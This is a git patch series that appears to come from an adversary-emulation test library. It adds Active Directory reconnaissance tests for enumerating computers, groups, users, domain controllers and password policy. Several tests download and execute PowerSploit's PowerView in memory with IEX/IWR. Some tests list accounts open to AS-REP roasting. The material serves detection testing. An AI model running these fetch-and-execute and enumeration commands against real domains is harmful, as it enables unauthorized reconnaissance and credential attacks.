+- [Atomic Test #16 - Enumerate Active Directory Computers with ADSISearcher](#atomic-test-16---enumerate-active-directory-computers-with-adsisearcher)
+
 
 <br/>
 
@@ -634,4 +636,34 @@ write-host "This PC must be manually added to a domain."
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #16 - Enumerate Active Directory Computers with ADSISearcher
+The following Atomic test will utilize ADSISearcher to enumerate computers within Active Directory.
+Upon successful execution a listing of computers will output with their paths in AD.
+Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 64ede6ac-b57a-41c2-a7d1-32c6cd35397d
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+([adsisearcher]"objectcategory=computer").FindAll(); ([adsisearcher]"objectcategory=computer").FindOne()
+```
+
+
+
+
+
+
 <br/>
diff --git a/atomics/T1069.002/T1069.002.md b/atomics/T1069.002/T1069.002.md
index 478cf7a8..999930da 100644
--- a/atomics/T1069.002/T1069.002.md
+++ b/atomics/T1069.002/T1069.002.md
@@ -22,6 +22,12 @@ Commands such as <code>net group /domain</code> of the [Net](https://attack.mitr
 
 - [Atomic Test #8 - Adfind - Query Active Directory Groups](#atomic-test-8---adfind---query-active-directory-groups)
 
+- [Atomic Test #9 - Enumerate Active Directory Groups with ADSISearcher](#atomic-test-9---enumerate-active-directory-groups-with-adsisearcher)
+
+- [Atomic Test #10 - Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)](#atomic-test-10---get-aduser-enumeration-using-useraccountcontrol-flags-as-rep-roasting)
+
+- [Atomic Test #11 - Get-DomainGroupMember with PowerView](#atomic-test-11---get-domaingroupmember-with-powerview)
+
 
 <br/>
 
@@ -308,4 +314,113 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #9 - Enumerate Active Directory Groups with ADSISearcher
+The following Atomic test will utilize ADSISearcher to enumerate groups within Active Directory.
+Upon successful execution a listing of groups will output with their paths in AD.
+Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 9f4e344b-8434-41b3-85b1-d38f29d148d0
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+([adsisearcher]"objectcategory=group").FindAll(); ([adsisearcher]"objectcategory=group").FindOne()
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #10 - Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)
+When successful, accounts that do not require kerberos pre-auth will be returned.
+Reference: https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Computer must be domain joined.
+##### Check Prereq Commands:
+```powershell
+if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host Joining this computer to a domain must be done manually.
+```
+##### Description: Requires the Active Directory module for powershell to be installed.
+##### Check Prereq Commands:
+```powershell
+if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0"
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #11 - Get-DomainGroupMember with PowerView
+Utilizing PowerView, run Get-DomainGroupMember to identify domain users. Upon execution, progress and info about groups within the domain being scanned will be displayed.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 46352f40-f283-4fe5-b56d-d9a71750e145
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroupMember "Domain Admins"
+```
+
+
+
+
+
+
 <br/>
diff --git a/atomics/T1087.002/T1087.002.md b/atomics/T1087.002/T1087.002.md
index 254f6d75..55e4e2bd 100644
--- a/atomics/T1087.002/T1087.002.md
+++ b/atomics/T1087.002/T1087.002.md
@@ -26,6 +26,8 @@ Commands such as <code>net user /domain</code> and <code>net group /domain</code
 
 - [Atomic Test #10 - Enumerate Active Directory for Unconstrained Delegation](#atomic-test-10---enumerate-active-directory-for-unconstrained-delegation)
 
+- [Atomic Test #11 - Enumerate Active Directory Users with ADSISearcher](#atomic-test-11---enumerate-active-directory-users-with-adsisearcher)
+
 
 <br/>
 
@@ -441,4 +443,34 @@ if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #11 - Enumerate Active Directory Users with ADSISearcher
+The following Atomic test will utilize ADSISearcher to enumerate users within Active Directory.
+Upon successful execution a listing of users will output with their paths in AD.
+Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 02e8be5a-3065-4e54-8cc8-a14d138834d3
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
+```
+
+
+
+
+
+
 <br/>
diff --git a/atomics/T1558.004/T1558.004.md b/atomics/T1558.004/T1558.004.md
index 9d552e79..a294efbc 100644
--- a/atomics/T1558.004/T1558.004.md
+++ b/atomics/T1558.004/T1558.004.md
@@ -14,6 +14,8 @@ Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003)
 
 - [Atomic Test #1 - Rubeus asreproast](#atomic-test-1---rubeus-asreproast)
 
+- [Atomic Test #2 - Get-DomainUser with PowerView](#atomic-test-2---get-domainuser-with-powerview)
+
 
 <br/>
 
@@ -76,4 +78,33 @@ Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #2 - Get-DomainUser with PowerView
+Utilizing PowerView, run Get-DomainUser to identify domain users. Upon execution, progress and info about users within the domain being scanned will be displayed.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** d6139549-7b72-4e48-9ea1-324fc9bdf88a
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose
+```
+
+
+
+
+
+
 <br/>

From 687da9235b38ced720bc961d2bc06bca88c4c1ad Mon Sep 17 00:00:00 2001
From: Michael Haag <5632822+MHaggis@users.noreply.github.com>
Date: Mon, 14 Mar 2022 11:32:18 -0600
Subject: [PATCH 28/83] AD Enumeration - user/groups, pw policy (#1807)

* More AD

* fix conflict resolution mistake

* add powershell

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1018/T1018.yaml         | 36 +++++++++++++++++++++++++++++++-
 atomics/T1069.002/T1069.002.yaml | 23 +++++++++++++++++++-
 atomics/T1087.002/T1087.002.yaml | 11 ++++++++++
 atomics/T1201/T1201.yaml         | 23 +++++++++++++++++++-
 4 files changed, 90 insertions(+), 3 deletions(-)

diff --git a/atomics/T1018/T1018.yaml b/atomics/T1018/T1018.yaml
index 1f1212bb..b5460626 100644
--- a/atomics/T1018/T1018.yaml
+++ b/atomics/T1018/T1018.yaml
@@ -310,6 +310,18 @@ atomic_tests:
         Write-Host $Computer}
     name: powershell
     elevation_required: false
+- name: Enumerate Active Directory Computers with Get-AdComputer
+  description: |
+    The following Atomic test will utilize Get-AdComputer to enumerate Computers within Active Directory.
+    Upon successful execution a listing of Computers will output with their paths in AD.
+    Reference: https://github.com/MicrosoftDocs/windows-powershell-docs/blob/main/docset/winserver2022-ps/activedirectory/Get-ADComputer.md
+  supported_platforms:
+  - windows
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      Get-AdComputer -Filter *
 - name: Enumerate Active Directory Computers with ADSISearcher
   auto_generated_guid: 64ede6ac-b57a-41c2-a7d1-32c6cd35397d
   description: |
@@ -322,4 +334,26 @@ atomic_tests:
     name: powershell
     elevation_required: false
     command: |
-      ([adsisearcher]"objectcategory=computer").FindAll(); ([adsisearcher]"objectcategory=computer").FindOne()
\ No newline at end of file
+      ([adsisearcher]"objectcategory=computer").FindAll(); ([adsisearcher]"objectcategory=computer").FindOne()
+- name: Get-DomainController with PowerView
+  description: |
+    Utilizing PowerView, run Get-DomainController to identify the Domain Controller. Upon execution, information about the domain controller within the domain will be displayed.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainController -verbose
+    name: powershell
+- name: Get-wmiobject to Enumerate Domain Controllers
+  description: |
+    The following Atomic test will utilize get-wmiobject to enumerate Active Directory for Domain Controllers.
+    Upon successful execution a listing of Systems from AD will output with their paths.
+    Reference: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1
+  supported_platforms:
+  - windows
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      get-wmiobject -class ds_computer -namespace root\directory\ldap
\ No newline at end of file
diff --git a/atomics/T1069.002/T1069.002.yaml b/atomics/T1069.002/T1069.002.yaml
index daebe0b7..0b8911c4 100644
--- a/atomics/T1069.002/T1069.002.yaml
+++ b/atomics/T1069.002/T1069.002.yaml
@@ -133,6 +133,17 @@ atomic_tests:
     command: |
       #{adfind_path} -f (objectcategory=group)
     name: command_prompt
+- name: Enumerate Active Directory Groups with Get-AdGroup
+  description: |
+    The following Atomic test will utilize Get-AdGroup to enumerate groups within Active Directory.
+    Upon successful execution a listing of groups will output with their paths in AD.
+    Reference: https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-adgroup?view=windowsserver2022-ps
+  supported_platforms:
+  - windows
+  executor:
+    name: powershell
+    command: |
+      Get-AdGroup -Filter *
 - name: Enumerate Active Directory Groups with ADSISearcher
   auto_generated_guid: 9f4e344b-8434-41b3-85b1-d38f29d148d0
   description: |
@@ -182,4 +193,14 @@ atomic_tests:
     command: |
       [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
       IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroupMember "Domain Admins"
-    name: powershell
\ No newline at end of file
+    name: powershell 
+- name: Get-DomainGroup with PowerView
+  description: |
+    Utilizing PowerView, run Get-DomainGroup to identify the domain groups. Upon execution, Groups within the domain will be listed.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroup -verbose
+    name: powershell 
diff --git a/atomics/T1087.002/T1087.002.yaml b/atomics/T1087.002/T1087.002.yaml
index fd3d98f1..6b58abdc 100644
--- a/atomics/T1087.002/T1087.002.yaml
+++ b/atomics/T1087.002/T1087.002.yaml
@@ -214,6 +214,17 @@ atomic_tests:
     elevation_required: false
     command: |
       Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
+
+- name: Get-DomainUser with PowerView
+  description: |
+    Utilizing PowerView, run Get-DomainUser to identify the domain users. Upon execution, Users within the domain will be listed.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
+    name: powershell
 - name: Enumerate Active Directory Users with ADSISearcher
   auto_generated_guid: 02e8be5a-3065-4e54-8cc8-a14d138834d3
   description: |
diff --git a/atomics/T1201/T1201.yaml b/atomics/T1201/T1201.yaml
index 62a3041a..0a7c409c 100644
--- a/atomics/T1201/T1201.yaml
+++ b/atomics/T1201/T1201.yaml
@@ -85,4 +85,25 @@ atomic_tests:
   executor:
     command: pwpolicy getaccountpolicies
     name: bash
-
+- name: Get-DomainPolicy with PowerView
+  description: |
+    Utilizing PowerView, run Get-DomainPolicy to return the default domain policy or the domain controller policy for the current domain or a specified domain/domain controller.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainPolicy -verbose
+    name: powershell
+- name: Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy
+  description: |
+    The following Atomic test will utilize get-addefaultdomainpasswordpolicy to enumerate domain password policy.
+    Upon successful execution a listing of the policy implemented will display.
+    Reference: https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-addefaultdomainpasswordpolicy?view=windowsserver2022-ps
+  supported_platforms:
+  - windows
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      get-addefaultdomainpasswordpolicy
\ No newline at end of file

From 5e47dae27bdc609f6776f3af93510fb1784906da Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team GUID generator <email>
Date: Mon, 14 Mar 2022 17:32:49 +0000
Subject: [PATCH 29/83] Generate GUIDs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/T1018/T1018.yaml         | 3 +++
 atomics/T1069.002/T1069.002.yaml | 2 ++
 atomics/T1087.002/T1087.002.yaml | 1 +
 atomics/T1201/T1201.yaml         | 2 ++
 atomics/used_guids.txt           | 8 ++++++++
 5 files changed, 16 insertions(+)

diff --git a/atomics/T1018/T1018.yaml b/atomics/T1018/T1018.yaml
index b5460626..c1b676c6 100644
--- a/atomics/T1018/T1018.yaml
+++ b/atomics/T1018/T1018.yaml
@@ -311,6 +311,7 @@ atomic_tests:
     name: powershell
     elevation_required: false
 - name: Enumerate Active Directory Computers with Get-AdComputer
+  auto_generated_guid: 97e89d9e-e3f5-41b5-a90f-1e0825df0fdf
   description: |
     The following Atomic test will utilize Get-AdComputer to enumerate Computers within Active Directory.
     Upon successful execution a listing of Computers will output with their paths in AD.
@@ -336,6 +337,7 @@ atomic_tests:
     command: |
       ([adsisearcher]"objectcategory=computer").FindAll(); ([adsisearcher]"objectcategory=computer").FindOne()
 - name: Get-DomainController with PowerView
+  auto_generated_guid: b9d2e8ca-5520-4737-8076-4f08913da2c4
   description: |
     Utilizing PowerView, run Get-DomainController to identify the Domain Controller. Upon execution, information about the domain controller within the domain will be displayed.
   supported_platforms:
@@ -346,6 +348,7 @@ atomic_tests:
       IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainController -verbose
     name: powershell
 - name: Get-wmiobject to Enumerate Domain Controllers
+  auto_generated_guid: e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad
   description: |
     The following Atomic test will utilize get-wmiobject to enumerate Active Directory for Domain Controllers.
     Upon successful execution a listing of Systems from AD will output with their paths.
diff --git a/atomics/T1069.002/T1069.002.yaml b/atomics/T1069.002/T1069.002.yaml
index 0b8911c4..ca4b2d31 100644
--- a/atomics/T1069.002/T1069.002.yaml
+++ b/atomics/T1069.002/T1069.002.yaml
@@ -134,6 +134,7 @@ atomic_tests:
       #{adfind_path} -f (objectcategory=group)
     name: command_prompt
 - name: Enumerate Active Directory Groups with Get-AdGroup
+  auto_generated_guid: 3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8
   description: |
     The following Atomic test will utilize Get-AdGroup to enumerate groups within Active Directory.
     Upon successful execution a listing of groups will output with their paths in AD.
@@ -195,6 +196,7 @@ atomic_tests:
       IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroupMember "Domain Admins"
     name: powershell 
 - name: Get-DomainGroup with PowerView
+  auto_generated_guid: 5a8a181c-2c8e-478d-a943-549305a01230
   description: |
     Utilizing PowerView, run Get-DomainGroup to identify the domain groups. Upon execution, Groups within the domain will be listed.
   supported_platforms:
diff --git a/atomics/T1087.002/T1087.002.yaml b/atomics/T1087.002/T1087.002.yaml
index 6b58abdc..79f6cdf7 100644
--- a/atomics/T1087.002/T1087.002.yaml
+++ b/atomics/T1087.002/T1087.002.yaml
@@ -216,6 +216,7 @@ atomic_tests:
       Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
 
 - name: Get-DomainUser with PowerView
+  auto_generated_guid: 93662494-5ed7-4454-a04c-8c8372808ac2
   description: |
     Utilizing PowerView, run Get-DomainUser to identify the domain users. Upon execution, Users within the domain will be listed.
   supported_platforms:
diff --git a/atomics/T1201/T1201.yaml b/atomics/T1201/T1201.yaml
index 0a7c409c..43716efe 100644
--- a/atomics/T1201/T1201.yaml
+++ b/atomics/T1201/T1201.yaml
@@ -86,6 +86,7 @@ atomic_tests:
     command: pwpolicy getaccountpolicies
     name: bash
 - name: Get-DomainPolicy with PowerView
+  auto_generated_guid: 3177f4da-3d4b-4592-8bdc-aa23d0b2e843
   description: |
     Utilizing PowerView, run Get-DomainPolicy to return the default domain policy or the domain controller policy for the current domain or a specified domain/domain controller.
   supported_platforms:
@@ -96,6 +97,7 @@ atomic_tests:
       IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainPolicy -verbose
     name: powershell
 - name: Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy
+  auto_generated_guid: b2698b33-984c-4a1c-93bb-e4ba72a0babb
   description: |
     The following Atomic test will utilize get-addefaultdomainpasswordpolicy to enumerate domain password policy.
     Upon successful execution a listing of the policy implemented will display.
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index 80e8ed2f..b8ce28f8 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -890,3 +890,11 @@ a27418de-bdce-4ebd-b655-38f04842bf0c
 46352f40-f283-4fe5-b56d-d9a71750e145
 02e8be5a-3065-4e54-8cc8-a14d138834d3
 d6139549-7b72-4e48-9ea1-324fc9bdf88a
+97e89d9e-e3f5-41b5-a90f-1e0825df0fdf
+b9d2e8ca-5520-4737-8076-4f08913da2c4
+e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad
+3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8
+5a8a181c-2c8e-478d-a943-549305a01230
+93662494-5ed7-4454-a04c-8c8372808ac2
+3177f4da-3d4b-4592-8bdc-aa23d0b2e843
+b2698b33-984c-4a1c-93bb-e4ba72a0babb

From 1209d7b0f6fdfccbc9f02fb046bf24cd281b3194 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Mon, 14 Mar 2022 17:32:56 +0000
Subject: [PATCH 30/83] Generate docs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/Indexes/Indexes-CSV/index.csv         |  18 ++-
 atomics/Indexes/Indexes-CSV/windows-index.csv |  18 ++-
 atomics/Indexes/Indexes-Markdown/index.md     |  18 ++-
 .../Indexes/Indexes-Markdown/windows-index.md |  18 ++-
 atomics/Indexes/index.yaml                    | 109 +++++++++++++++++-
 atomics/T1018/T1018.md                        |  99 +++++++++++++++-
 atomics/T1069.002/T1069.002.md                |  75 +++++++++++-
 atomics/T1087.002/T1087.002.md                |  35 +++++-
 atomics/T1201/T1201.md                        |  63 ++++++++++
 9 files changed, 422 insertions(+), 31 deletions(-)

diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 4e598d60..01e8bc05 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -782,7 +782,8 @@ discovery,T1087.002,Domain Account,7,Adfind - Enumerate Active Directory User Ob
 discovery,T1087.002,Domain Account,8,Adfind - Enumerate Active Directory Exchange AD Objects,5e2938fb-f919-47b6-8b29-2f6a1f718e99,command_prompt
 discovery,T1087.002,Domain Account,9,Enumerate Default Domain Admin Details (Domain),c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef,command_prompt
 discovery,T1087.002,Domain Account,10,Enumerate Active Directory for Unconstrained Delegation,46f8dbe9-22a5-4770-8513-66119c5be63b,powershell
-discovery,T1087.002,Domain Account,11,Enumerate Active Directory Users with ADSISearcher,02e8be5a-3065-4e54-8cc8-a14d138834d3,powershell
+discovery,T1087.002,Domain Account,11,Get-DomainUser with PowerView,93662494-5ed7-4454-a04c-8c8372808ac2,powershell
+discovery,T1087.002,Domain Account,12,Enumerate Active Directory Users with ADSISearcher,02e8be5a-3065-4e54-8cc8-a14d138834d3,powershell
 discovery,T1069.002,Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt
 discovery,T1069.002,Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell
 discovery,T1069.002,Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt
@@ -791,9 +792,11 @@ discovery,T1069.002,Domain Groups,5,Find local admins on all machines in domain
 discovery,T1069.002,Domain Groups,6,Find Local Admins via Group Policy (PowerView),64fdb43b-5259-467a-b000-1b02c00e510a,powershell
 discovery,T1069.002,Domain Groups,7,Enumerate Users Not Requiring Pre Auth (ASRepRoast),870ba71e-6858-4f6d-895c-bb6237f6121b,powershell
 discovery,T1069.002,Domain Groups,8,Adfind - Query Active Directory Groups,48ddc687-82af-40b7-8472-ff1e742e8274,command_prompt
-discovery,T1069.002,Domain Groups,9,Enumerate Active Directory Groups with ADSISearcher,9f4e344b-8434-41b3-85b1-d38f29d148d0,powershell
-discovery,T1069.002,Domain Groups,10,Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting),43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8,powershell
-discovery,T1069.002,Domain Groups,11,Get-DomainGroupMember with PowerView,46352f40-f283-4fe5-b56d-d9a71750e145,powershell
+discovery,T1069.002,Domain Groups,9,Enumerate Active Directory Groups with Get-AdGroup,3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8,powershell
+discovery,T1069.002,Domain Groups,10,Enumerate Active Directory Groups with ADSISearcher,9f4e344b-8434-41b3-85b1-d38f29d148d0,powershell
+discovery,T1069.002,Domain Groups,11,Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting),43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8,powershell
+discovery,T1069.002,Domain Groups,12,Get-DomainGroupMember with PowerView,46352f40-f283-4fe5-b56d-d9a71750e145,powershell
+discovery,T1069.002,Domain Groups,13,Get-DomainGroup with PowerView,5a8a181c-2c8e-478d-a943-549305a01230,powershell
 discovery,T1482,Domain Trust Discovery,1,Windows - Discover domain trusts with dsquery,4700a710-c821-4e17-a3ec-9e4c81d6845f,command_prompt
 discovery,T1482,Domain Trust Discovery,2,Windows - Discover domain trusts with nltest,2e22641d-0498-48d2-b9ff-c71e496ccdbe,command_prompt
 discovery,T1482,Domain Trust Discovery,3,Powershell enumerate domains and forests,c58fbc62-8a62-489e-8f2d-3565d7d96f30,powershell
@@ -843,6 +846,8 @@ discovery,T1201,Password Policy Discovery,4,Examine password expiration policy -
 discovery,T1201,Password Policy Discovery,5,Examine local password policy - Windows,4588d243-f24e-4549-b2e3-e627acc089f6,command_prompt
 discovery,T1201,Password Policy Discovery,6,Examine domain password policy - Windows,46c2c362-2679-4ef5-aec9-0e958e135be4,command_prompt
 discovery,T1201,Password Policy Discovery,7,Examine password policy - macOS,4b7fa042-9482-45e1-b348-4b756b2a0742,bash
+discovery,T1201,Password Policy Discovery,8,Get-DomainPolicy with PowerView,3177f4da-3d4b-4592-8bdc-aa23d0b2e843,powershell
+discovery,T1201,Password Policy Discovery,9,Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy,b2698b33-984c-4a1c-93bb-e4ba72a0babb,powershell
 discovery,T1120,Peripheral Device Discovery,1,Win32_PnPEntity Hardware Inventory,2cb4dbf2-2dca-4597-8678-4d39d207a3a5,powershell
 discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b39d-38d9791407cc,sh
 discovery,T1057,Process Discovery,2,Process Discovery - tasklist,c5806a4f-62b8-4900-980b-c7ec004e9908,command_prompt
@@ -862,7 +867,10 @@ discovery,T1018,Remote System Discovery,12,Remote System Discovery - ip neighbou
 discovery,T1018,Remote System Discovery,13,Remote System Discovery - ip route,1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1,sh
 discovery,T1018,Remote System Discovery,14,Remote System Discovery - ip tcp_metrics,6c2da894-0b57-43cb-87af-46ea3b501388,sh
 discovery,T1018,Remote System Discovery,15,Enumerate domain computers within Active Directory using DirectorySearcher,962a6017-1c09-45a6-880b-adc9c57cb22e,powershell
-discovery,T1018,Remote System Discovery,16,Enumerate Active Directory Computers with ADSISearcher,64ede6ac-b57a-41c2-a7d1-32c6cd35397d,powershell
+discovery,T1018,Remote System Discovery,16,Enumerate Active Directory Computers with Get-AdComputer,97e89d9e-e3f5-41b5-a90f-1e0825df0fdf,powershell
+discovery,T1018,Remote System Discovery,17,Enumerate Active Directory Computers with ADSISearcher,64ede6ac-b57a-41c2-a7d1-32c6cd35397d,powershell
+discovery,T1018,Remote System Discovery,18,Get-DomainController with PowerView,b9d2e8ca-5520-4737-8076-4f08913da2c4,powershell
+discovery,T1018,Remote System Discovery,19,Get-wmiobject to Enumerate Domain Controllers,e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad,powershell
 discovery,T1518.001,Security Software Discovery,1,Security Software Discovery,f92a380f-ced9-491f-b338-95a991418ce2,command_prompt
 discovery,T1518.001,Security Software Discovery,2,Security Software Discovery - powershell,7f566051-f033-49fb-89de-b6bacab730f0,powershell
 discovery,T1518.001,Security Software Discovery,3,Security Software Discovery - ps (macOS),ba62ce11-e820-485f-9c17-6f3c857cd840,sh
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 2a0ede05..b504ab75 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -525,7 +525,8 @@ discovery,T1087.002,Domain Account,7,Adfind - Enumerate Active Directory User Ob
 discovery,T1087.002,Domain Account,8,Adfind - Enumerate Active Directory Exchange AD Objects,5e2938fb-f919-47b6-8b29-2f6a1f718e99,command_prompt
 discovery,T1087.002,Domain Account,9,Enumerate Default Domain Admin Details (Domain),c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef,command_prompt
 discovery,T1087.002,Domain Account,10,Enumerate Active Directory for Unconstrained Delegation,46f8dbe9-22a5-4770-8513-66119c5be63b,powershell
-discovery,T1087.002,Domain Account,11,Enumerate Active Directory Users with ADSISearcher,02e8be5a-3065-4e54-8cc8-a14d138834d3,powershell
+discovery,T1087.002,Domain Account,11,Get-DomainUser with PowerView,93662494-5ed7-4454-a04c-8c8372808ac2,powershell
+discovery,T1087.002,Domain Account,12,Enumerate Active Directory Users with ADSISearcher,02e8be5a-3065-4e54-8cc8-a14d138834d3,powershell
 discovery,T1069.002,Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt
 discovery,T1069.002,Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell
 discovery,T1069.002,Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt
@@ -534,9 +535,11 @@ discovery,T1069.002,Domain Groups,5,Find local admins on all machines in domain
 discovery,T1069.002,Domain Groups,6,Find Local Admins via Group Policy (PowerView),64fdb43b-5259-467a-b000-1b02c00e510a,powershell
 discovery,T1069.002,Domain Groups,7,Enumerate Users Not Requiring Pre Auth (ASRepRoast),870ba71e-6858-4f6d-895c-bb6237f6121b,powershell
 discovery,T1069.002,Domain Groups,8,Adfind - Query Active Directory Groups,48ddc687-82af-40b7-8472-ff1e742e8274,command_prompt
-discovery,T1069.002,Domain Groups,9,Enumerate Active Directory Groups with ADSISearcher,9f4e344b-8434-41b3-85b1-d38f29d148d0,powershell
